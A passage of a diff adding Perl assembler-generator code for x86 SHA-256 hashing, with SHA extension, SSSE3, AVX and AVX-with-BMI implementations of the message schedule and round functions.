+    {	&data_byte(0x0f,0x38,$opcodelet,0xc0|($1<<3)|$2);	}
+}
+sub sha256rnds2	{ sha256op38(0xcb,@_); }
+sub sha256msg1	{ sha256op38(0xcc,@_); }
+sub sha256msg2	{ sha256op38(0xcd,@_); }
+
+&set_label("shaext",32);
+	&sub		("esp",32);
+
+	&movdqu		($ABEF,&QWP(0,$ctx));		# DCBA
+	&lea		($K256,&DWP(0x80,$K256));
+	&movdqu		($CDGH,&QWP(16,$ctx));		# HGFE
+	&movdqa		($TMP,&QWP(0x100-0x80,$K256));	# byte swap mask
+
+	&pshufd		($Wi,$ABEF,0x1b);		# ABCD
+	&pshufd		($ABEF,$ABEF,0xb1);		# CDAB
+	&pshufd		($CDGH,$CDGH,0x1b);		# EFGH
+	&palignr	($ABEF,$CDGH,8);		# ABEF
+	&punpcklqdq	($CDGH,$Wi);			# CDGH
+	&jmp		(&label("loop_shaext"));
+
+&set_label("loop_shaext",16);
+	&movdqu		(@MSG[0],&QWP(0,$inp));
+	&movdqu		(@MSG[1],&QWP(0x10,$inp));
+	&movdqu		(@MSG[2],&QWP(0x20,$inp));
+	&pshufb		(@MSG[0],$TMP);
+	&movdqu		(@MSG[3],&QWP(0x30,$inp));
+	&movdqa		(&QWP(16,"esp"),$CDGH);		# offload
+
+	&movdqa		($Wi,&QWP(0*16-0x80,$K256));
+	&paddd		($Wi,@MSG[0]);
+	&pshufb		(@MSG[1],$TMP);
+	&sha256rnds2	($CDGH,$ABEF);			# 0-3
+	&pshufd		($Wi,$Wi,0x0e);
+	&nop		();
+	&movdqa		(&QWP(0,"esp"),$ABEF);		# offload
+	&sha256rnds2	($ABEF,$CDGH);
+
+	&movdqa		($Wi,&QWP(1*16-0x80,$K256));
+	&paddd		($Wi,@MSG[1]);
+	&pshufb		(@MSG[2],$TMP);
+	&sha256rnds2	($CDGH,$ABEF);			# 4-7
+	&pshufd		($Wi,$Wi,0x0e);
+	&lea		($inp,&DWP(0x40,$inp));
+	&sha256msg1	(@MSG[0],@MSG[1]);
+	&sha256rnds2	($ABEF,$CDGH);
+
+	&movdqa		($Wi,&QWP(2*16-0x80,$K256));
+	&paddd		($Wi,@MSG[2]);
+	&pshufb		(@MSG[3],$TMP);
+	&sha256rnds2	($CDGH,$ABEF);			# 8-11
+	&pshufd		($Wi,$Wi,0x0e);
+	&movdqa		($TMP,@MSG[3]);
+	&palignr	($TMP,@MSG[2],4);
+	&nop		();
+	&paddd		(@MSG[0],$TMP);
+	&sha256msg1	(@MSG[1],@MSG[2]);
+	&sha256rnds2	($ABEF,$CDGH);
+
+	&movdqa		($Wi,&QWP(3*16-0x80,$K256));
+	&paddd		($Wi,@MSG[3]);
+	&sha256msg2	(@MSG[0],@MSG[3]);
+	&sha256rnds2	($CDGH,$ABEF);			# 12-15
+	&pshufd		($Wi,$Wi,0x0e);
+	&movdqa		($TMP,@MSG[0]);
+	&palignr	($TMP,@MSG[3],4);
+	&nop		();
+	&paddd		(@MSG[1],$TMP);
+	&sha256msg1	(@MSG[2],@MSG[3]);
+	&sha256rnds2	($ABEF,$CDGH);
+
+for($i=4;$i<16-3;$i++) {
+	&movdqa		($Wi,&QWP($i*16-0x80,$K256));
+	&paddd		($Wi,@MSG[0]);
+	&sha256msg2	(@MSG[1],@MSG[0]);
+	&sha256rnds2	($CDGH,$ABEF);			# 16-19...
+	&pshufd		($Wi,$Wi,0x0e);
+	&movdqa		($TMP,@MSG[1]);
+	&palignr	($TMP,@MSG[0],4);
+	&nop		();
+	&paddd		(@MSG[2],$TMP);
+	&sha256msg1	(@MSG[3],@MSG[0]);
+	&sha256rnds2	($ABEF,$CDGH);
+
+	push(@MSG,shift(@MSG));
+}
+	&movdqa		($Wi,&QWP(13*16-0x80,$K256));
+	&paddd		($Wi,@MSG[0]);
+	&sha256msg2	(@MSG[1],@MSG[0]);
+	&sha256rnds2	($CDGH,$ABEF);			# 52-55
+	&pshufd		($Wi,$Wi,0x0e);
+	&movdqa		($TMP,@MSG[1])
+	&palignr	($TMP,@MSG[0],4);
+	&sha256rnds2	($ABEF,$CDGH);
+	&paddd		(@MSG[2],$TMP);
+
+	&movdqa		($Wi,&QWP(14*16-0x80,$K256));
+	&paddd		($Wi,@MSG[1]);
+	&sha256rnds2	($CDGH,$ABEF);			# 56-59
+	&pshufd		($Wi,$Wi,0x0e);
+	&sha256msg2	(@MSG[2],@MSG[1]);
+	&movdqa		($TMP,&QWP(0x100-0x80,$K256));	# byte swap mask
+	&sha256rnds2	($ABEF,$CDGH);
+
+	&movdqa		($Wi,&QWP(15*16-0x80,$K256));
+	&paddd		($Wi,@MSG[2]);
+	&nop		();
+	&sha256rnds2	($CDGH,$ABEF);			# 60-63
+	&pshufd		($Wi,$Wi,0x0e);
+	&cmp		($end,$inp);
+	&nop		();
+	&sha256rnds2	($ABEF,$CDGH);
+
+	&paddd		($CDGH,&QWP(16,"esp"));
+	&paddd		($ABEF,&QWP(0,"esp"));
+	&jnz		(&label("loop_shaext"));
+
+	&pshufd		($CDGH,$CDGH,0xb1);		# DCHG
+	&pshufd		($TMP,$ABEF,0x1b);		# FEBA
+	&pshufd		($ABEF,$ABEF,0xb1);		# BAFE
+	&punpckhqdq	($ABEF,$CDGH);			# DCBA
+	&palignr	($CDGH,$TMP,8);			# HGFE
+
+	&mov		("esp",&DWP(32+12,"esp"));
+	&movdqu		(&QWP(0,$ctx),$ABEF);
+	&movdqu		(&QWP(16,$ctx),$CDGH);
+&function_end_A();
+}
+
+my @X = map("xmm$_",(0..3));
+my ($t0,$t1,$t2,$t3) = map("xmm$_",(4..7));
+my @AH = ($A,$T);
+
+&set_label("SSSE3",32);
+	&lea	("esp",&DWP(-96,"esp"));
+	# copy ctx->h[0-7] to A,B,C,D,E,F,G,H on stack
+	&mov	($AH[0],&DWP(0,"esi"));
+	&mov	($AH[1],&DWP(4,"esi"));
+	&mov	("ecx",&DWP(8,"esi"));
+	&mov	("edi",&DWP(12,"esi"));
+	#&mov	(&DWP(0,"esp"),$AH[0]);
+	&mov	(&DWP(4,"esp"),$AH[1]);
+	&xor	($AH[1],"ecx");			# magic
+	&mov	(&DWP(8,"esp"),"ecx");
+	&mov	(&DWP(12,"esp"),"edi");
+	&mov	($E,&DWP(16,"esi"));
+	&mov	("edi",&DWP(20,"esi"));
+	&mov	("ecx",&DWP(24,"esi"));
+	&mov	("esi",&DWP(28,"esi"));
+	#&mov	(&DWP(16,"esp"),$E);
+	&mov	(&DWP(20,"esp"),"edi");
+	&mov	("edi",&DWP(96+4,"esp"));	# inp
+	&mov	(&DWP(24,"esp"),"ecx");
+	&mov	(&DWP(28,"esp"),"esi");
+	&movdqa	($t3,&QWP(256,$K256));
+	&jmp	(&label("grand_ssse3"));
+
+&set_label("grand_ssse3",16);
+	# load input, reverse byte order, add K256[0..15], save to stack
+	&movdqu	(@X[0],&QWP(0,"edi"));
+	&movdqu	(@X[1],&QWP(16,"edi"));
+	&movdqu	(@X[2],&QWP(32,"edi"));
+	&movdqu	(@X[3],&QWP(48,"edi"));
+	&add	("edi",64);
+	&pshufb	(@X[0],$t3);
+	&mov	(&DWP(96+4,"esp"),"edi");
+	&pshufb	(@X[1],$t3);
+	&movdqa	($t0,&QWP(0,$K256));
+	&pshufb	(@X[2],$t3);
+	&movdqa	($t1,&QWP(16,$K256));
+	&paddd	($t0,@X[0]);
+	&pshufb	(@X[3],$t3);
+	&movdqa	($t2,&QWP(32,$K256));
+	&paddd	($t1,@X[1]);
+	&movdqa	($t3,&QWP(48,$K256));
+	&movdqa	(&QWP(32+0,"esp"),$t0);
+	&paddd	($t2,@X[2]);
+	&movdqa	(&QWP(32+16,"esp"),$t1);
+	&paddd	($t3,@X[3]);
+	&movdqa	(&QWP(32+32,"esp"),$t2);
+	&movdqa	(&QWP(32+48,"esp"),$t3);
+	&jmp	(&label("ssse3_00_47"));
+
+&set_label("ssse3_00_47",16);
+	&add		($K256,64);
+
+sub SSSE3_00_47 () {
+my $j = shift;
+my $body = shift;
+my @X = @_;
+my @insns = (&$body,&$body,&$body,&$body);	# 120 instructions
+
+	  eval(shift(@insns));
+	&movdqa		($t0,@X[1]);
+	  eval(shift(@insns));			# @
+	  eval(shift(@insns));
+	&movdqa		($t3,@X[3]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&palignr	($t0,@X[0],4);		# X[1..4]
+	  eval(shift(@insns));
+	  eval(shift(@insns));			# @
+	  eval(shift(@insns));
+	 &palignr	($t3,@X[2],4);		# X[9..12]
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&movdqa		($t1,$t0);
+	  eval(shift(@insns));			# @
+	  eval(shift(@insns));
+	&movdqa		($t2,$t0);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&psrld		($t0,3);
+	  eval(shift(@insns));
+	  eval(shift(@insns));			# @
+	 &paddd		(@X[0],$t3);		# X[0..3] += X[9..12]
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&psrld		($t2,7);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));			# @
+	  eval(shift(@insns));
+	 &pshufd	($t3,@X[3],0b11111010);	# X[14..15]
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&pslld		($t1,32-18);
+	  eval(shift(@insns));
+	  eval(shift(@insns));			# @
+	&pxor		($t0,$t2);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&psrld		($t2,18-7);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));			# @
+	&pxor		($t0,$t1);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&pslld		($t1,18-7);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));			# @
+	&pxor		($t0,$t2);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &movdqa	($t2,$t3);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));			# @
+	&pxor		($t0,$t1);		# sigma0(X[1..4])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &psrld		($t3,10);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));			# @
+	&paddd		(@X[0],$t0);		# X[0..3] += sigma0(X[1..4])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &psrlq		($t2,17);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));			# @
+	 &pxor		($t3,$t2);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &psrlq		($t2,19-17);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));			# @
+	 &pxor		($t3,$t2);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &pshufd	($t3,$t3,0b10000000);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));			# @
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));			# @
+	  eval(shift(@insns));
+	 &psrldq	($t3,8);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&paddd		(@X[0],$t3);		# X[0..1] += sigma1(X[14..15])
+	  eval(shift(@insns));			# @
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));			# @
+	  eval(shift(@insns));
+	 &pshufd	($t3,@X[0],0b01010000);	# X[16..17]
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &movdqa	($t2,$t3);
+	  eval(shift(@insns));			# @
+	 &psrld		($t3,10);
+	  eval(shift(@insns));
+	 &psrlq		($t2,17);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));			# @
+	 &pxor		($t3,$t2);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &psrlq		($t2,19-17);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));			# @
+	 &pxor		($t3,$t2);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &pshufd	($t3,$t3,0b00001000);
+	  eval(shift(@insns));
+	  eval(shift(@insns));			# @
+	&movdqa		($t2,&QWP(16*$j,$K256));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &pslldq	($t3,8);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));			# @
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));			# @
+	&paddd		(@X[0],$t3);		# X[2..3] += sigma1(X[16..17])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&paddd		($t2,@X[0]);
+	  eval(shift(@insns));			# @
+
+	foreach (@insns) { eval; }		# remaining instructions
+
+	&movdqa		(&QWP(32+16*$j,"esp"),$t2);
+}
+
+sub body_00_15 () {
+	(
+	'&mov	("ecx",$E);',
+	'&ror	($E,25-11);',
+	 '&mov	("esi",&off($f));',
+	'&xor	($E,"ecx");',
+	 '&mov	("edi",&off($g));',
+	 '&xor	("esi","edi");',
+	'&ror	($E,11-6);',
+	 '&and	("esi","ecx");',
+	 '&mov	(&off($e),"ecx");',	# save $E, modulo-scheduled
+	'&xor	($E,"ecx");',
+	 '&xor	("edi","esi");',	# Ch(e,f,g)
+	'&ror	($E,6);',		# T = Sigma1(e)
+	 '&mov	("ecx",$AH[0]);',
+	 '&add	($E,"edi");',		# T += Ch(e,f,g)
+	 '&mov	("edi",&off($b));',
+	'&mov	("esi",$AH[0]);',
+
+	'&ror	("ecx",22-13);',
+	 '&mov	(&off($a),$AH[0]);',	# save $A, modulo-scheduled
+	'&xor	("ecx",$AH[0]);',
+	 '&xor	($AH[0],"edi");',	# a ^= b, (b^c) in next round
+	 '&add	($E,&off($h));',	# T += h
+	'&ror	("ecx",13-2);',
+	 '&and	($AH[1],$AH[0]);',	# (b^c) &= (a^b)
+	'&xor	("ecx","esi");',
+	 '&add	($E,&DWP(32+4*($i&15),"esp"));',	# T += K[i]+X[i]
+	 '&xor	($AH[1],"edi");',	# h = Maj(a,b,c) = Ch(a^b,c,b)
+	'&ror	("ecx",2);',		# Sigma0(a)
+
+	 '&add	($AH[1],$E);',		# h += T
+	 '&add	($E,&off($d));',	# d += T
+	'&add	($AH[1],"ecx");'.	# h += Sigma0(a)
+
+	'@AH = reverse(@AH); $i++;'	# rotate(a,h)
+	);
+}
+
+    for ($i=0,$j=0; $j<4; $j++) {
+	&SSSE3_00_47($j,\&body_00_15,@X);
+	push(@X,shift(@X));		# rotate(@X)
+    }
+	&cmp	(&DWP(16*$j,$K256),0x00010203);
+	&jne	(&label("ssse3_00_47"));
+
+    for ($i=0; $i<16; ) {
+	foreach(body_00_15()) { eval; }
+    }
+
+	&mov	("esi",&DWP(96,"esp"));	#ctx
+					#&mov	($AH[0],&DWP(0,"esp"));
+	&xor	($AH[1],"edi");		#&mov	($AH[1],&DWP(4,"esp"));
+					#&mov	("edi", &DWP(8,"esp"));
+	&mov	("ecx",&DWP(12,"esp"));
+	&add	($AH[0],&DWP(0,"esi"));
+	&add	($AH[1],&DWP(4,"esi"));
+	&add	("edi",&DWP(8,"esi"));
+	&add	("ecx",&DWP(12,"esi"));
+	&mov	(&DWP(0,"esi"),$AH[0]);
+	&mov	(&DWP(4,"esi"),$AH[1]);
+	&mov	(&DWP(8,"esi"),"edi");
+	&mov	(&DWP(12,"esi"),"ecx");
+	 #&mov	(&DWP(0,"esp"),$AH[0]);
+	 &mov	(&DWP(4,"esp"),$AH[1]);
+	 &xor	($AH[1],"edi");			# magic
+	 &mov	(&DWP(8,"esp"),"edi");
+	 &mov	(&DWP(12,"esp"),"ecx");
+	#&mov	($E,&DWP(16,"esp"));
+	&mov	("edi",&DWP(20,"esp"));
+	&mov	("ecx",&DWP(24,"esp"));
+	&add	($E,&DWP(16,"esi"));
+	&add	("edi",&DWP(20,"esi"));
+	&add	("ecx",&DWP(24,"esi"));
+	&mov	(&DWP(16,"esi"),$E);
+	&mov	(&DWP(20,"esi"),"edi");
+	 &mov	(&DWP(20,"esp"),"edi");
+	&mov	("edi",&DWP(28,"esp"));
+	&mov	(&DWP(24,"esi"),"ecx");
+	 #&mov	(&DWP(16,"esp"),$E);
+	&add	("edi",&DWP(28,"esi"));
+	 &mov	(&DWP(24,"esp"),"ecx");
+	&mov	(&DWP(28,"esi"),"edi");
+	 &mov	(&DWP(28,"esp"),"edi");
+	&mov	("edi",&DWP(96+4,"esp"));	# inp
+
+	&movdqa	($t3,&QWP(64,$K256));
+	&sub	($K256,3*64);			# rewind K
+	&cmp	("edi",&DWP(96+8,"esp"));	# are we done yet?
+	&jb	(&label("grand_ssse3"));
+
+	&mov	("esp",&DWP(96+12,"esp"));	# restore sp
+&function_end_A();
+						if ($avx) {
+&set_label("AVX",32);
+						if ($avx>1) {
+	&and	("edx",1<<8|1<<3);		# check for BMI2+BMI1
+	&cmp	("edx",1<<8|1<<3);
+	&je	(&label("AVX_BMI"));
+						}
+	&lea	("esp",&DWP(-96,"esp"));
+	&vzeroall	();
+	# copy ctx->h[0-7] to A,B,C,D,E,F,G,H on stack
+	&mov	($AH[0],&DWP(0,"esi"));
+	&mov	($AH[1],&DWP(4,"esi"));
+	&mov	("ecx",&DWP(8,"esi"));
+	&mov	("edi",&DWP(12,"esi"));
+	#&mov	(&DWP(0,"esp"),$AH[0]);
+	&mov	(&DWP(4,"esp"),$AH[1]);
+	&xor	($AH[1],"ecx");			# magic
+	&mov	(&DWP(8,"esp"),"ecx");
+	&mov	(&DWP(12,"esp"),"edi");
+	&mov	($E,&DWP(16,"esi"));
+	&mov	("edi",&DWP(20,"esi"));
+	&mov	("ecx",&DWP(24,"esi"));
+	&mov	("esi",&DWP(28,"esi"));
+	#&mov	(&DWP(16,"esp"),$E);
+	&mov	(&DWP(20,"esp"),"edi");
+	&mov	("edi",&DWP(96+4,"esp"));	# inp
+	&mov	(&DWP(24,"esp"),"ecx");
+	&mov	(&DWP(28,"esp"),"esi");
+	&vmovdqa	($t3,&QWP(256,$K256));
+	&jmp	(&label("grand_avx"));
+
+&set_label("grand_avx",32);
+	# load input, reverse byte order, add K256[0..15], save to stack
+	&vmovdqu	(@X[0],&QWP(0,"edi"));
+	&vmovdqu	(@X[1],&QWP(16,"edi"));
+	&vmovdqu	(@X[2],&QWP(32,"edi"));
+	&vmovdqu	(@X[3],&QWP(48,"edi"));
+	&add		("edi",64);
+	&vpshufb	(@X[0],@X[0],$t3);
+	&mov		(&DWP(96+4,"esp"),"edi");
+	&vpshufb	(@X[1],@X[1],$t3);
+	&vpshufb	(@X[2],@X[2],$t3);
+	&vpaddd		($t0,@X[0],&QWP(0,$K256));
+	&vpshufb	(@X[3],@X[3],$t3);
+	&vpaddd		($t1,@X[1],&QWP(16,$K256));
+	&vpaddd		($t2,@X[2],&QWP(32,$K256));
+	&vpaddd		($t3,@X[3],&QWP(48,$K256));
+	&vmovdqa	(&QWP(32+0,"esp"),$t0);
+	&vmovdqa	(&QWP(32+16,"esp"),$t1);
+	&vmovdqa	(&QWP(32+32,"esp"),$t2);
+	&vmovdqa	(&QWP(32+48,"esp"),$t3);
+	&jmp		(&label("avx_00_47"));
+
+&set_label("avx_00_47",16);
+	&add		($K256,64);
+
+sub Xupdate_AVX () {
+	(
+	'&vpalignr	($t0,@X[1],@X[0],4);',	# X[1..4]
+	 '&vpalignr	($t3,@X[3],@X[2],4);',	# X[9..12]
+	'&vpsrld	($t2,$t0,7);',
+	 '&vpaddd	(@X[0],@X[0],$t3);',	# X[0..3] += X[9..16]
+	'&vpsrld	($t3,$t0,3);',
+	'&vpslld	($t1,$t0,14);',
+	'&vpxor		($t0,$t3,$t2);',
+	 '&vpshufd	($t3,@X[3],0b11111010)',# X[14..15]
+	'&vpsrld	($t2,$t2,18-7);',
+	'&vpxor		($t0,$t0,$t1);',
+	'&vpslld	($t1,$t1,25-14);',
+	'&vpxor		($t0,$t0,$t2);',
+	 '&vpsrld	($t2,$t3,10);',
+	'&vpxor		($t0,$t0,$t1);',	# sigma0(X[1..4])
+	 '&vpsrlq	($t1,$t3,17);',
+	'&vpaddd	(@X[0],@X[0],$t0);',	# X[0..3] += sigma0(X[1..4])
+	 '&vpxor	($t2,$t2,$t1);',
+	 '&vpsrlq	($t3,$t3,19);',
+	 '&vpxor	($t2,$t2,$t3);',	# sigma1(X[14..15]
+	 '&vpshufd	($t3,$t2,0b10000100);',
+	'&vpsrldq	($t3,$t3,8);',
+	'&vpaddd	(@X[0],@X[0],$t3);',	# X[0..1] += sigma1(X[14..15])
+	 '&vpshufd	($t3,@X[0],0b01010000)',# X[16..17]
+	 '&vpsrld	($t2,$t3,10);',
+	 '&vpsrlq	($t1,$t3,17);',
+	 '&vpxor	($t2,$t2,$t1);',
+	 '&vpsrlq	($t3,$t3,19);',
+	 '&vpxor	($t2,$t2,$t3);',	# sigma1(X[16..17]
+	 '&vpshufd	($t3,$t2,0b11101000);',
+	'&vpslldq	($t3,$t3,8);',
+	'&vpaddd	(@X[0],@X[0],$t3);'	# X[2..3] += sigma1(X[16..17])
+	);
+}
+
+local *ror = sub { &shrd(@_[0],@_) };
+sub AVX_00_47 () {
+my $j = shift;
+my $body = shift;
+my @X = @_;
+my @insns = (&$body,&$body,&$body,&$body);	# 120 instructions
+my $insn;
+
+	foreach (Xupdate_AVX()) {		# 31 instructions
+	    eval;
+	    eval(shift(@insns));
+	    eval(shift(@insns));
+	    eval($insn = shift(@insns));
+	    eval(shift(@insns)) if ($insn =~ /rorx/ && @insns[0] =~ /rorx/);
+	}
+	&vpaddd		($t2,@X[0],&QWP(16*$j,$K256));
+	foreach (@insns) { eval; }		# remaining instructions
+	&vmovdqa	(&QWP(32+16*$j,"esp"),$t2);
+}
+
+    for ($i=0,$j=0; $j<4; $j++) {
+	&AVX_00_47($j,\&body_00_15,@X);
+	push(@X,shift(@X));		# rotate(@X)
+    }
+	&cmp	(&DWP(16*$j,$K256),0x00010203);
+	&jne	(&label("avx_00_47"));
+
+    for ($i=0; $i<16; ) {
+	foreach(body_00_15()) { eval; }
+    }
+
+	&mov	("esi",&DWP(96,"esp"));	#ctx
+					#&mov	($AH[0],&DWP(0,"esp"));
+	&xor	($AH[1],"edi");		#&mov	($AH[1],&DWP(4,"esp"));
+					#&mov	("edi", &DWP(8,"esp"));
+	&mov	("ecx",&DWP(12,"esp"));
+	&add	($AH[0],&DWP(0,"esi"));
+	&add	($AH[1],&DWP(4,"esi"));
+	&add	("edi",&DWP(8,"esi"));
+	&add	("ecx",&DWP(12,"esi"));
+	&mov	(&DWP(0,"esi"),$AH[0]);
+	&mov	(&DWP(4,"esi"),$AH[1]);
+	&mov	(&DWP(8,"esi"),"edi");
+	&mov	(&DWP(12,"esi"),"ecx");
+	 #&mov	(&DWP(0,"esp"),$AH[0]);
+	 &mov	(&DWP(4,"esp"),$AH[1]);
+	 &xor	($AH[1],"edi");			# magic
+	 &mov	(&DWP(8,"esp"),"edi");
+	 &mov	(&DWP(12,"esp"),"ecx");
+	#&mov	($E,&DWP(16,"esp"));
+	&mov	("edi",&DWP(20,"esp"));
+	&mov	("ecx",&DWP(24,"esp"));
+	&add	($E,&DWP(16,"esi"));
+	&add	("edi",&DWP(20,"esi"));
+	&add	("ecx",&DWP(24,"esi"));
+	&mov	(&DWP(16,"esi"),$E);
+	&mov	(&DWP(20,"esi"),"edi");
+	 &mov	(&DWP(20,"esp"),"edi");
+	&mov	("edi",&DWP(28,"esp"));
+	&mov	(&DWP(24,"esi"),"ecx");
+	 #&mov	(&DWP(16,"esp"),$E);
+	&add	("edi",&DWP(28,"esi"));
+	 &mov	(&DWP(24,"esp"),"ecx");
+	&mov	(&DWP(28,"esi"),"edi");
+	 &mov	(&DWP(28,"esp"),"edi");
+	&mov	("edi",&DWP(96+4,"esp"));	# inp
+
+	&vmovdqa	($t3,&QWP(64,$K256));
+	&sub	($K256,3*64);			# rewind K
+	&cmp	("edi",&DWP(96+8,"esp"));	# are we done yet?
+	&jb	(&label("grand_avx"));
+
+	&mov	("esp",&DWP(96+12,"esp"));	# restore sp
+	&vzeroall	();
+&function_end_A();
+						if ($avx>1) {
+sub bodyx_00_15 () {			# +10%
+	(
+	'&rorx	("ecx",$E,6)',
+	'&rorx	("esi",$E,11)',
+	 '&mov	(&off($e),$E)',		# save $E, modulo-scheduled
+	'&rorx	("edi",$E,25)',
+	'&xor	("ecx","esi")',
+	 '&andn	("esi",$E,&off($g))',
+	'&xor	("ecx","edi")',		# Sigma1(e)
+	 '&and	($E,&off($f))',
+	 '&mov	(&off($a),$AH[0]);',	# save $A, modulo-scheduled
+	 '&or	($E,"esi")',		# T = Ch(e,f,g)
+
+	'&rorx	("edi",$AH[0],2)',
+	'&rorx	("esi",$AH[0],13)',
+	 '&lea	($E,&DWP(0,$E,"ecx"))',	# T += Sigma1(e)
+	'&rorx	("ecx",$AH[0],22)',
+	'&xor	("esi","edi")',
+	 '&mov	("edi",&off($b))',
+	'&xor	("ecx","esi")',		# Sigma0(a)
+
+	 '&xor	($AH[0],"edi")',	# a ^= b, (b^c) in next round
+	 '&add	($E,&off($h))',		# T += h
+	 '&and	($AH[1],$AH[0])',	# (b^c) &= (a^b)
+	 '&add	($E,&DWP(32+4*($i&15),"esp"))',	# T += K[i]+X[i]
+	 '&xor	($AH[1],"edi")',	# h = Maj(a,b,c) = Ch(a^b,c,b)
+
+	 '&add	("ecx",$E)',		# h += T
+	 '&add	($E,&off($d))',		# d += T
+	'&lea	($AH[1],&DWP(0,$AH[1],"ecx"));'.	# h += Sigma0(a)
+
+	'@AH = reverse(@AH); $i++;'	# rotate(a,h)
+	);
+}
+
+&set_label("AVX_BMI",32);
+	&lea	("esp",&DWP(-96,"esp"));
+	&vzeroall	();
+	# copy ctx->h[0-7] to A,B,C,D,E,F,G,H on stack
+	&mov	($AH[0],&DWP(0,"esi"));
+	&mov	($AH[1],&DWP(4,"esi"));
+	&mov	("ecx",&DWP(8,"esi"));
+	&mov	("edi",&DWP(12,"esi"));
+	#&mov	(&DWP(0,"esp"),$AH[0]);
+	&mov	(&DWP(4,"esp"),$AH[1]);
+	&xor	($AH[1],"ecx");			# magic
+	&mov	(&DWP(8,"esp"),"ecx");
+	&mov	(&DWP(12,"esp"),"edi");
+	&mov	($E,&DWP(16,"esi"));
+	&mov	("edi",&DWP(20,"esi"));
+	&mov	("ecx",&DWP(24,"esi"));
+	&mov	("esi",&DWP(28,"esi"));
+	#&mov	(&DWP(16,"esp"),$E);
+	&mov	(&DWP(20,"esp"),"edi");
+	&mov	("edi",&DWP(96+4,"esp"));	# inp
+	&mov	(&DWP(24,"esp"),"ecx");
+	&mov	(&DWP(28,"esp"),"esi");
+	&vmovdqa	($t3,&QWP(256,$K256));
+	&jmp	(&label("grand_avx_bmi"));
+
+&set_label("grand_avx_bmi",32);
+	# load input, reverse byte order, add K256[0..15], save to stack
+	&vmovdqu	(@X[0],&QWP(0,"edi"));
+	&vmovdqu	(@X[1],&QWP(16,"edi"));
+	&vmovdqu	(@X[2],&QWP(32,"edi"));
+	&vmovdqu	(@X[3],&QWP(48,"edi"));
+	&add		("edi",64);
+	&vpshufb	(@X[0],@X[0],$t3);
+	&mov		(&DWP(96+4,"esp"),"edi");
+	&vpshufb	(@X[1],@X[1],$t3);
+	&vpshufb	(@X[2],@X[2],$t3);
+	&vpaddd		($t0,@X[0],&QWP(0,$K256));
+	&vpshufb	(@X[3],@X[3],$t3);
+	&vpaddd		($t1,@X[1],&QWP(16,$K256));
+	&vpaddd		($t2,@X[2],&QWP(32,$K256));
+	&vpaddd		($t3,@X[3],&QWP(48,$K256));
+	&vmovdqa	(&QWP(32+0,"esp"),$t0);
+	&vmovdqa	(&QWP(32+16,"esp"),$t1);
+	&vmovdqa	(&QWP(32+32,"esp"),$t2);
+	&vmovdqa	(&QWP(32+48,"esp"),$t3);
+	&jmp		(&label("avx_bmi_00_47"));
+
+&set_label("avx_bmi_00_47",16);
+	&add		($K256,64);
+
+    for ($i=0,$j=0; $j<4; $j++) {
+	&AVX_00_47($j,\&bodyx_00_15,@X);
+	push(@X,shift(@X));		# rotate(@X)
+    }
+	&cmp	(&DWP(16*$j,$K256),0x00010203);
+	&jne	(&label("avx_bmi_00_47"));
+
+    for ($i=0; $i<16; ) {
+	foreach(bodyx_00_15()) { eval; }
+    }
+
+	&mov	("esi",&DWP(96,"esp"));	#ctx
+					#&mov	($AH[0],&DWP(0,"esp"));
+	&xor	($AH[1],"edi");		#&mov	($AH[1],&DWP(4,"esp"));
+					#&mov	("edi", &DWP(8,"esp"));
+	&mov	("ecx",&DWP(12,"esp"));
+	&add	($AH[0],&DWP(0,"esi"));
+	&add	($AH[1],&DWP(4,"esi"));
+	&add	("edi",&DWP(8,"esi"));
+	&add	("ecx",&DWP(12,"esi"));
+	&mov	(&DWP(0,"esi"),$AH[0]);
+	&mov	(&DWP(4,"esi"),$AH[1]);
+	&mov	(&DWP(8,"esi"),"edi");
+	&mov	(&DWP(12,"esi"),"ecx");
+	 #&mov	(&DWP(0,"esp"),$AH[0]);
+	 &mov	(&DWP(4,"esp"),$AH[1]);
+	 &xor	($AH[1],"edi");			# magic
+	 &mov	(&DWP(8,"esp"),"edi");
+	 &mov	(&DWP(12,"esp"),"ecx");
+	#&mov	($E,&DWP(16,"esp"));
+	&mov	("edi",&DWP(20,"esp"));
+	&mov	("ecx",&DWP(24,"esp"));
